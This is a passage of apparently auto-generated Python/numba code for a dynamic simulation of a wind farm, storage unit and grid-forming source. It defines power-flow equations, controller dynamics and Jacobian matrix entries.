struct[0].Gy_ini[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,25] = -S_n_GRID/S_base
struct[0].Gy_ini[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,26] = -S_n_GRID/S_base
struct[0].Gy_ini[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,27] = K_p_GRID
struct[0].Gy_ini[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,23] = -R_v_GRID
struct[0].Gy_ini[23,24] = X_v_GRID
struct[0].Gy_ini[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,23] = -X_v_GRID
struct[0].Gy_ini[24,24] = -R_v_GRID
struct[0].Gy_ini[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[27,22] = -1/Droop_GRID
struct[0].Gy_ini[27,29] = K_sec_GRID
struct[0].Gy_ini[29,28] = -K_p_agc
@numba.njit(cache=True)
def run(t,struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_run[0,0]
theta_W1lv = struct[0].y_run[1,0]
V_W2lv = struct[0].y_run[2,0]
theta_W2lv = struct[0].y_run[3,0]
V_W3lv = struct[0].y_run[4,0]
theta_W3lv = struct[0].y_run[5,0]
V_STlv = struct[0].y_run[6,0]
theta_STlv = struct[0].y_run[7,0]
V_W1mv = struct[0].y_run[8,0]
theta_W1mv = struct[0].y_run[9,0]
V_W2mv = struct[0].y_run[10,0]
theta_W2mv = struct[0].y_run[11,0]
V_W3mv = struct[0].y_run[12,0]
theta_W3mv = struct[0].y_run[13,0]
V_POImv = struct[0].y_run[14,0]
theta_POImv = struct[0].y_run[15,0]
V_STmv = struct[0].y_run[16,0]
theta_STmv = struct[0].y_run[17,0]
V_POI = struct[0].y_run[18,0]
theta_POI = struct[0].y_run[19,0]
V_GRID = struct[0].y_run[20,0]
theta_GRID = struct[0].y_run[21,0]
omega_GRID = struct[0].y_run[22,0]
i_d_GRID = struct[0].y_run[23,0]
i_q_GRID = struct[0].y_run[24,0]
p_g_GRID = struct[0].y_run[25,0]
q_g_GRID = struct[0].y_run[26,0]
p_m_GRID = struct[0].y_run[27,0]
omega_coi = struct[0].y_run[28,0]
p_agc = struct[0].y_run[29,0]
struct[0].u_run[0,0] = P_W1lv
struct[0].u_run[1,0] = Q_W1lv
struct[0].u_run[2,0] = P_W2lv
struct[0].u_run[3,0] = Q_W2lv
struct[0].u_run[4,0] = P_W3lv
struct[0].u_run[5,0] = Q_W3lv
struct[0].u_run[6,0] = P_STlv
struct[0].u_run[7,0] = Q_STlv
struct[0].u_run[8,0] = P_W1mv
struct[0].u_run[9,0] = Q_W1mv
struct[0].u_run[10,0] = P_W2mv
struct[0].u_run[11,0] = Q_W2mv
struct[0].u_run[12,0] = P_W3mv
struct[0].u_run[13,0] = Q_W3mv
struct[0].u_run[14,0] = P_POImv
struct[0].u_run[15,0] = Q_POImv
struct[0].u_run[16,0] = P_STmv
struct[0].u_run[17,0] = Q_STmv
struct[0].u_run[18,0] = P_POI
struct[0].u_run[19,0] = Q_POI
struct[0].u_run[20,0] = P_GRID
struct[0].u_run[21,0] = Q_GRID
struct[0].u_run[22,0] = v_ref_GRID
struct[0].u_run[23,0] = p_m_GRID
struct[0].u_run[24,0] = p_c_GRID
struct[0].u_run[25,0] = omega_ref_GRID
struct[0].u_run[26,0] = q_ref_GRID
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy) @ np.ascontiguousarray(struct[0].y_run) + np.ascontiguousarray(struct[0].Gu) @ np.ascontiguousarray(struct[0].u_run)
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx[0,0] = -K_delta_GRID
struct[0].Fx[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy[0,22] = Omega_b_GRID
struct[0].Fy[0,28] = -Omega_b_GRID
struct[0].Fy[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,27] = 1
struct[0].Fy[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy[3,28] = -1
struct[0].Gx[22,0] = K_p_GRID*(-V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gx[22,1] = K_p_GRID/T_p_GRID
struct[0].Gx[23,0] = -V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx[24,0] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx[24,2] = 1
struct[0].Gx[25,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx[26,0] = -V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx[29,3] = K_i_agc
struct[0].Gy[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
